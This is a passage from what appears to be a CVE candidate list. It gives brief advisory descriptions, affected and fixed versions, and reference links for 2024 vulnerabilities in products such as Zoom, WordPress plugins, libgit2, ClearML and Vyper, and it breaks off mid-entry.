CVE    2024    24705    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Octa Code Accessibility. This issue affects Accessibility: from n/a through 1.0.6.    MISC:https://patchstack.com/database/vulnerability/accessibility/wordpress-accessibility-plugin-1-0-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/accessibility/wordpress-accessibility-plugin-1-0-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24702    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Matt Martz & Andy Stratton Page Restrict. This issue affects Page Restrict: from n/a through 2.5.5.    MISC:https://patchstack.com/database/vulnerability/pagerestrict/wordpress-page-restrict-plugin-2-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pagerestrict/wordpress-page-restrict-plugin-2-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24701    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Native Grid LLC A no-code page builder for beautiful performance-based content. This issue affects A no-code page builder for beautiful performance-based content: from n/a through 2.1.20.    MISC:https://patchstack.com/database/vulnerability/setka-editor/wordpress-setka-editor-plugin-2-1-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/setka-editor/wordpress-setka-editor-plugin-2-1-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24699    Candidate    Business logic error in some Zoom clients may allow an authenticated user to conduct information disclosure via network access.    MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24006/   |   URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24006/    Assigned (20240126)
CVE    2024    24698    Candidate    Improper authentication in some Zoom clients may allow a privileged user to conduct a disclosure of information via local access.    MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24005/   |   URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24005/    Assigned (20240126)
CVE    2024    24697    Candidate    Untrusted search path in some Zoom 32 bit Windows clients may allow an authenticated user to conduct an escalation of privilege via local access.    MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24004/   |   URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24004/    Assigned (20240126)
CVE    2024    24696    Candidate    Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an authenticated user to conduct a disclosure of information via network access.    MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24003/   |   URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24003/    Assigned (20240126)
CVE    2024    24693    Candidate    Improper access control in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.    MISC:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/   |   URL:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/    Assigned (20240126)
CVE    2024    24692    Candidate    Race condition in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.    MISC:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/   |   URL:https://www.zoom.com/en/trust/security-bulletin/zsb-24009/    Assigned (20240126)
CVE    2024    24691    Candidate    Improper input validation in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows may allow an unauthenticated user to conduct an escalation of privilege via network access.    MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24008/   |   URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24008/    Assigned (20240126)
CVE    2024    24690    Candidate    Improper input validation in some Zoom clients may allow an authenticated user to conduct a denial of service via network access.    MISC:https://www.zoom.com/en/trust/security-bulletin/ZSB-24007/   |   URL:https://www.zoom.com/en/trust/security-bulletin/ZSB-24007/    Assigned (20240126)
CVE    2024    2469    Candidate    An attacker with an Administrator role in GitHub Enterprise Server could gain SSH root access via remote code execution. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.17, 3.9.12, 3.10.9, 3.11.7 and 3.12.1. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7   |   MISC:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1   |   URL:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12    Assigned (20240314)
CVE    2024    24683    Candidate    Improper Input Validation vulnerability in Apache Hop Engine. This issue affects Apache Hop Engine: before 2.8.0. Users are recommended to upgrade to version 2.8.0, which fixes the issue. When Hop Server writes links to the PrepareExecutionPipelineServlet page one of the parameters provided to the user was not properly escaped. The variable not properly escaped is the "id", which is not directly accessible by users creating pipelines making the risk of exploiting this low. This issue only affects users using the Hop Server component and does not directly affect the client.    MISC:https://lists.apache.org/thread/ts203zssv1n9qth1wdlhk2bhos3vcq6t   |   URL:https://lists.apache.org/thread/ts203zssv1n9qth1wdlhk2bhos3vcq6t    Assigned (20240126)
CVE    2024    24681    Candidate    Insecure AES key in Yealink Configuration Encrypt Tool below version 1.2. A single, vendorwide, hardcoded AES key in the configuration tool used to encrypt provisioning documents was leaked leading to a compromise of confidentiality of provisioning documents.    MISC:https://www.reddit.com/r/VOIP/comments/ys9mel/what_are_some_of_the_good_white_label_voip/    Assigned (20240126)
CVE    2024    24680    Candidate    An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings.    MISC:https://docs.djangoproject.com/en/5.0/releases/security/   |   MISC:https://groups.google.com/forum/#!forum/django-announce   |   MISC:https://www.djangoproject.com/weblog/2024/feb/06/security-releases/    Assigned (20240126)
CVE    2024    2468    Candidate    The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress widget 'embedpress_pro_twitch_theme ' attribute in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve    Assigned (20240314)
CVE    2024    2465    Candidate    Open redirection vulnerability in CDeX application allows to redirect users to arbitrary websites via a specially crafted URL. This issue affects CDeX application versions through 5.7.1.    MISC:https://cdex.cloud/   |   URL:https://cdex.cloud/   |   MISC:https://cert.pl/en/posts/2024/03/CVE-2024-2463/   |   URL:https://cert.pl/en/posts/2024/03/CVE-2024-2463/   |   MISC:https://cert.pl/posts/2024/03/CVE-2024-2463/   |   URL:https://cert.pl/posts/2024/03/CVE-2024-2463/    Assigned (20240314)
CVE    2024    2464    Candidate    This issue occurs during password recovery, where a difference in messages could allow an attacker to determine if the user is valid or not, enabling a brute force attack with valid users. This issue affects CDeX application versions through 5.7.1.    MISC:https://cdex.cloud/   |   URL:https://cdex.cloud/   |   MISC:https://cert.pl/en/posts/2024/03/CVE-2024-2463/   |   URL:https://cert.pl/en/posts/2024/03/CVE-2024-2463/   |   MISC:https://cert.pl/posts/2024/03/CVE-2024-2463/   |   URL:https://cert.pl/posts/2024/03/CVE-2024-2463/    Assigned (20240314)
CVE    2024    2463    Candidate    Weak password recovery mechanism in CDeX application allows to retrieve password reset token. This issue affects CDeX application versions through 5.7.1.    MISC:https://cdex.cloud/   |   URL:https://cdex.cloud/   |   MISC:https://cert.pl/en/posts/2024/03/CVE-2024-2463/   |   URL:https://cert.pl/en/posts/2024/03/CVE-2024-2463/   |   MISC:https://cert.pl/posts/2024/03/CVE-2024-2463/   |   URL:https://cert.pl/posts/2024/03/CVE-2024-2463/    Assigned (20240314)
CVE    2024    2460    Candidate    The GamiPress – Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gamipress_button' shortcode in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3051778%40gamipress-button&new=3051778%40gamipress-button&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/af39e563-5d88-460d-b02d-1aaa111c89dd?source=cve    Assigned (20240314)
CVE    2024    24595    Candidate    Allegro AI’s open-source version of ClearML stores passwords in plaintext within the MongoDB instance, resulting in a compromised server leaking all user emails and passwords.    MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/   |   URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/    Assigned (20240125)
CVE    2024    24594    Candidate    A cross-site scripting (XSS) vulnerability in all versions of the web server component of Allegro AI’s ClearML platform allows a remote attacker to execute a JavaScript payload when a user views the Debug Samples tab in the web UI.    MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/   |   URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/    Assigned (20240125)
CVE    2024    24593    Candidate    A cross-site request forgery (CSRF) vulnerability in all versions up to 1.14.1 of the api server component of Allegro AI’s ClearML platform allows a remote attacker to impersonate a user by sending API requests via maliciously crafted html. Exploitation of the vulnerability allows an attacker to compromise confidential workspaces and files, leak sensitive information, and target instances of the ClearML platform within closed off networks.    MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/   |   URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/    Assigned (20240125)
CVE    2024    24592    Candidate    Lack of authentication in all versions of the fileserver component of Allegro AI’s ClearML platform allows a remote attacker to arbitrarily access, create, modify and delete files.    MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/   |   URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/    Assigned (20240125)
CVE    2024    24591    Candidate    A path traversal vulnerability in versions 1.4.0 to 1.14.1 of the client SDK of Allegro AI’s ClearML platform enables a maliciously uploaded dataset to write local or remote files to an arbitrary location on an end user’s system when interacted with.    MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/   |   URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/    Assigned (20240125)
CVE    2024    24590    Candidate    Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.    MISC:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/   |   URL:https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/    Assigned (20240125)
CVE    2024    2459    Candidate    The UX Flat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://wordpress.org/plugins/ux-flat/   |   URL:https://wordpress.org/plugins/ux-flat/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1d93db2c-7baf-42d8-9b4a-be91b27221a7?source=cve    Assigned (20240314)
CVE    2024    24579    Candidate    stereoscope is a go library for processing container images and simulating a squash filesystem. Prior to version 0.0.1, it is possible to craft an OCI tar archive that, when stereoscope attempts to unarchive the contents, will result in writing to paths outside of the unarchive temporary directory. Specifically, use of `github.com/anchore/stereoscope/pkg/file.UntarToDirectory()` function, the `github.com/anchore/stereoscope/pkg/image/oci.TarballImageProvider` struct, or the higher level `github.com/anchore/stereoscope/pkg/image.Image.Read()` function express this vulnerability. As a workaround, if you are using the OCI archive as input into stereoscope then you can switch to using an OCI layout by unarchiving the tar archive and provide the unarchived directory to stereoscope.    MISC:https://github.com/anchore/stereoscope/commit/09dacab4d9ee65ee8bc7af8ebf4aa7b5aaa36204   |   URL:https://github.com/anchore/stereoscope/commit/09dacab4d9ee65ee8bc7af8ebf4aa7b5aaa36204   |   MISC:https://github.com/anchore/stereoscope/security/advisories/GHSA-hpxr-w9w7-g4gv   |   URL:https://github.com/anchore/stereoscope/security/advisories/GHSA-hpxr-w9w7-g4gv    Assigned (20240125)
CVE    2024    24578    Candidate    RaspberryMatic is an open-source operating system for HomeMatic internet-of-things devices. RaspberryMatic / OCCU prior to version 3.75.6.20240316 contains an unauthenticated remote code execution (RCE) vulnerability, caused by multiple issues within the Java based `HMIPServer.jar` component. RaspberryMatic includes a Java based `HMIPServer` that can be accessed through URLs starting with `/pages/jpages`. The `FirmwareController` class does however not perform any session id checks, thus this feature can be accessed without a valid session. Due to this issue, attackers can gain remote code execution as root user, allowing a full system compromise. Version 3.75.6.20240316 contains a patch.    MISC:https://github.com/jens-maus/RaspberryMatic/security/advisories/GHSA-q967-q4j8-637h   |   URL:https://github.com/jens-maus/RaspberryMatic/security/advisories/GHSA-q967-q4j8-637h    Assigned (20240125)
CVE    2024    24577    Candidate    libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.    FEDORA:FEDORA-2024-605004a28e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/   |   FEDORA:FEDORA-2024-8ba389815f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/   |   FEDORA:FEDORA-2024-92bac3b909   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/   |   FEDORA:FEDORA-2024-993d3a78dd   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/   |   FEDORA:FEDORA-2024-a7a3c8ccdd   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/   |   MISC:https://github.com/libgit2/libgit2/releases/tag/v1.6.5   |   URL:https://github.com/libgit2/libgit2/releases/tag/v1.6.5   |   MISC:https://github.com/libgit2/libgit2/releases/tag/v1.7.2   |   URL:https://github.com/libgit2/libgit2/releases/tag/v1.7.2   |   MISC:https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8   |   URL:https://github.com/libgit2/libgit2/security/advisories/GHSA-j2v7-4f6v-gpg8   |   MLIST:[debian-lts-announce] 20240227 [SECURITY] [DLA 3742-1] libgit2 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00012.html    Assigned (20240125)
CVE    2024    24575    Candidate    libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.    FEDORA:FEDORA-2024-605004a28e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S635BGHHZUMRPI7QOXOJ45QHDD5FFZ3S/   |   FEDORA:FEDORA-2024-8ba389815f   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z6MXOX7I43OWNN7R6M54XLG6U5RXY244/   |   FEDORA:FEDORA-2024-92bac3b909   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7CNDW3PF6NHO7OXNM5GN6WSSGAMA7MZE/   |   FEDORA:FEDORA-2024-993d3a78dd   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGNHOEE2RBLH7KCJUPUNYG4CDTW4HTBT/   |   FEDORA:FEDORA-2024-a7a3c8ccdd   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4M3P7WIEPXNRLBINQRJFXUSTNKBCHYC7/   |   MISC:https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa   |   URL:https://github.com/libgit2/libgit2/commit/add2dabb3c16aa49b33904dcdc07cd915efc12fa   |   MISC:https://github.com/libgit2/libgit2/releases/tag/v1.6.5   |   URL:https://github.com/libgit2/libgit2/releases/tag/v1.6.5   |   MISC:https://github.com/libgit2/libgit2/releases/tag/v1.7.2   |   URL:https://github.com/libgit2/libgit2/releases/tag/v1.7.2   |   MISC:https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v   |   URL:https://github.com/libgit2/libgit2/security/advisories/GHSA-54mf-x2rh-hq9v    Assigned (20240125)
CVE    2024    24574    Candidate    phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. Unsafe echo of filename in phpMyFAQ\phpmyfaq\admin\attachments.php leads to allowed execution of JavaScript code in client side (XSS). This vulnerability has been patched in version 3.2.5.    MISC:https://github.com/thorsten/phpMyFAQ/commit/5479b4a4603cce71aa7eb4437f1c201153a1f1f5   |   URL:https://github.com/thorsten/phpMyFAQ/commit/5479b4a4603cce71aa7eb4437f1c201153a1f1f5   |   MISC:https://github.com/thorsten/phpMyFAQ/pull/2827   |   URL:https://github.com/thorsten/phpMyFAQ/pull/2827   |   MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7m8g-fprr-47fx   |   URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7m8g-fprr-47fx    Assigned (20240125)
CVE    2024    24573    Candidate    facileManager is a modular suite of web apps built with the sysadmin in mind. In versions 4.5.0 and earlier, when a user updates their profile, a POST request containing user information is sent to the endpoint server/fm-modules/facileManager/ajax/processPost.php. It was found that non-admins can arbitrarily set their permissions and grant their non-admin accounts with super user privileges.    MISC:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877   |   URL:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877   |   MISC:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-w67q-pp62-j4pf   |   URL:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-w67q-pp62-j4pf    Assigned (20240125)
CVE    2024    24572    Candidate    facileManager is a modular suite of web apps built with the sysadmin in mind. In versions 4.5.0 and earlier, the $_REQUEST global array was unsafely called inside an extract() function in admin-logs.php. The PHP file fm-init.php prevents arbitrary manipulation of $_SESSION via the GET/POST parameters. However, it does not prevent manipulation of any other sensitive variables such as $search_sql. Knowing this, an authenticated user with privileges to view site logs can manipulate the search_sql variable by appending a GET parameter search_sql in the URL. The information above means that the checks and SQL injection prevention attempts were rendered unusable.    MISC:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877   |   URL:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877   |   MISC:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-xw34-8pj6-75gc   |   URL:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-xw34-8pj6-75gc    Assigned (20240125)
CVE    2024    24571    Candidate    facileManager is a modular suite of web apps built with the sysadmin in mind. For the facileManager web application versions 4.5.0 and earlier, we have found that XSS was present in almost all of the input fields as there is insufficient input validation.    MISC:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877   |   URL:https://github.com/WillyXJ/facileManager/commit/0aa850d4b518f10143a4c675142b15caa5872877   |   MISC:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-h7w3-xv88-2xqj   |   URL:https://github.com/WillyXJ/facileManager/security/advisories/GHSA-h7w3-xv88-2xqj    Assigned (20240125)
CVE    2024    24570    Candidate    Statamic is a Laravel and Git powered CMS. HTML files crafted to look like jpg files are able to be uploaded, allowing for XSS. This affects the front-end forms with asset fields without any mime type validation, asset fields in the control panel, and asset browser in the control panel. Additionally, if the XSS is crafted in a specific way, the "copy password reset link" feature may be exploited to gain access to a user's password reset token and gain access to their account. The authorized user is required to execute the XSS in order for the vulnerability to occur. In versions 4.46.0 and 3.4.17, the XSS vulnerability has been patched, and the copy password reset link functionality has been disabled.    FULLDISC:20240213 SEC Consult SA-20240212-0 :: Multiple Stored Cross-Site Scripting vulnerabilities in Statamic CMS   |   URL:http://seclists.org/fulldisclosure/2024/Feb/17   |   MISC:http://packetstormsecurity.com/files/177133/Statamic-CMS-Cross-Site-Scripting.html   |   MISC:https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9   |   URL:https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9    Assigned (20240125)
CVE    2024    24569    Candidate    The Pixee Java Code Security Toolkit is a set of security APIs meant to help secure Java code. `ZipSecurity#isBelowCurrentDirectory` is vulnerable to a partial-path traversal bypass. To be vulnerable to the bypass, the application must use toolkit version <=1.1.1, use ZipSecurity as a guard against path traversal, and have an exploit path. Although the control still prevents attackers from escaping the application path into higher level directories (e.g., /etc/), it will allow "escaping" into sibling paths. For example, if your running path is /my/app/path, an attacker could navigate into /my/app/path-something-else. This vulnerability is patched in 1.1.2.    MISC:https://github.com/pixee/java-security-toolkit/blob/7c8e93e6fb2420fb6003c54a741e267c4f883bab/src/main/java/io/github/pixee/security/ZipSecurity.java#L82-L87   |   URL:https://github.com/pixee/java-security-toolkit/blob/7c8e93e6fb2420fb6003c54a741e267c4f883bab/src/main/java/io/github/pixee/security/ZipSecurity.java#L82-L87   |   MISC:https://github.com/pixee/java-security-toolkit/commit/b885b03c9cfae53d62d239037f9654d973dd54d9   |   URL:https://github.com/pixee/java-security-toolkit/commit/b885b03c9cfae53d62d239037f9654d973dd54d9   |   MISC:https://github.com/pixee/java-security-toolkit/security/advisories/GHSA-qh4g-4m4w-jgv2   |   URL:https://github.com/pixee/java-security-toolkit/security/advisories/GHSA-qh4g-4m4w-jgv2    Assigned (20240125)
CVE    2024    24568    Candidate    Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.3, the rules inspecting HTTP2 headers can get bypassed by crafted traffic. The vulnerability has been patched in 7.0.3.    FEDORA:FEDORA-2024-7b063bce0a   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZXJIT7R53ZXROO3I256RFUWTIW4ECK6P/   |   FEDORA:FEDORA-2024-bd4eed8466   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GOCOBFUTIFHOP2PZOH4ENRFXRBHIRKK4/   |   MISC:https://github.com/OISF/suricata/commit/478a2a38f54e2ae235f8486bff87d7d66b6307f0   |   URL:https://github.com/OISF/suricata/commit/478a2a38f54e2ae235f8486bff87d7d66b6307f0   |   MISC:https://github.com/OISF/suricata/security/advisories/GHSA-gv29-5hqw-5h8c   |   URL:https://github.com/OISF/suricata/security/advisories/GHSA-gv29-5hqw-5h8c   |   MISC:https://redmine.openinfosecfoundation.org/issues/6717   |   URL:https://redmine.openinfosecfoundation.org/issues/6717    Assigned (20240125)
CVE    2024    24567    Candidate    Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. Vyper compiler allows passing a value in builtin raw_call even if the call is a delegatecall or a staticcall. But in the context of delegatecall and staticcall the handling of value is not possible due to the semantics of the respective opcodes, and vyper will silently ignore the value= argument. If the semantics of the EVM are unknown to the developer, he could suspect that by specifying the `value` kwarg, exactly the given amount will be sent along to the target. This vulnerability affects 0.3.10 and earlier versions.    MISC:https://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100   |   URL:https://github.com/vyperlang/vyper/blob/9136169468f317a53b4e7448389aa315f90b95ba/vyper/builtins/functions.py#L1100   |   MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-x2c2-q32w-4w6m   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-x2c2-q32w-4w6m    Assigned (20240125)
CVE    2024    24566    Candidate    Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4.    MISC:https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd   |   URL:https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd   |   MISC:https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37   |   URL:https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37    Assigned (20240125)
CVE    2024    24565    Candidate    CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. This vulnerability is patched in 5.3.9, 5.4.8, 5.5.4, and 5.6.1.    MISC:https://github.com/crate/crate/commit/4e857d675683095945dd524d6ba03e692c70ecd6   |   URL:https://github.com/crate/crate/commit/4e857d675683095945dd524d6ba03e692c70ecd6   |   MISC:https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96   |   URL:https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96    Assigned (20240125)
CVE    2024    24564    Candidate    Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. When using the built-in `extract32(b, start)`, if the `start` index provided has the side effect of updating `b`, the byte array to extract `32` bytes from, some dirty memory could be read and returned by `extract32`. This vulnerability affects 0.3.10 and earlier versions.    MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-4hwq-4cpm-8vmx   |   URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-4hwq-4cpm-8vmx    Assigned (20240125)
CVE    2024    24563    Candidate    Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. Arrays can be keyed by a signed integer, while they are defined for unsigned integers only. The typechecker doesn't throw when spotting the usage of an `int` as an index for an array. The typechecker allows the usage of signed integers to be used as indexes to arrays. The vulnerability is present in different forms in all versions, including `0.3.10`. For ints, the 2's complement representation is used. Because the array was declared very large, the bounds checking will pass. Negative values will simply be represented as very large numbers. As of time of publication, a fixed version does not exist. There are three potential vulnerability classes: unpredictable behavior, accessing inaccessible elements and denial of service. Class 1: If it is possible to index an array with a negative integer without reverting, this is most likely not anticipated by the developer and such accesses can cause unpredictable behavior for the contract. Class 2: If a contract has an invariant in the form `assert index < x`, the developer will suppose that no elements on indexes `y | y >= x` are accessible. However, by using negative indexes, this can be bypassed. Class 3: If the index is dependent on the state of the contract, this poses a risk of denial of service. If the state of the contract can be manipulated in such a way that the index will be forced to be negative, the array access can always revert (because most likely the array won't be declared extremely large). However, all these scenarios are highly unlikely. The most likely behavior is a revert on the bounds check.    MISC:https://github.com/vyperlang/vyper/blob/a1fd228cb9936c3e4bbca6f3ee3fb4426ef45490/vyper/codegen/core.py#L534-L541   |   